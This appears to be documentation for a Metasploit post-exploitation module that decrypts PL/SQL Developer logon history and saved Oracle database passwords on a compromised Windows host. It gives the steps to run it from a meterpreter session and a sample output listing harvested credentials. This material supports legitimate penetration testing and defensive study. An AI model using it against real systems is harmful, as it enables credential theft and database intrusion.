Jemmy Wang
1.4 KiB
1.4 KiB
Vulnerable Application
This module can decrypt the history of PL/SQL Deceloper, and passwords are available if the user chooses to remember the password. Analysis of encryption algorithm here. You can find its official website here.
Verification Steps
- Download and install PL/SQL Developer.
- (Optional) Change the PL/SQL Developer preference to save the passwords.
- Use PL/SQL Developer to log in to oracle databases.
- Get a
meterpretersession on a Windows host. - Do:
run post/windows/gather/credentials/plsql_developer - The username, password (only when configured to save passwords), SID of logon histories will be printed.
Options
PLSQL_PATH
- Specify the path of PL/SQL Developer
Scenarios
meterpreter > run windows/gather/credentials/plsql_developer
[*] Gather PL/SQL Developer History and Passwords on WIN-XXXXXXXXXXX
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
PL/SQL Developer History and Passwords
======================================
History
-------
sys/oracle@ORCL AS SYSDBA
test1/@ORCL
test2/password2@ORCL
user/password@server
[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231026190630_default_127.0.0.1_host.plsql_devel_674990.txt
meterpreter >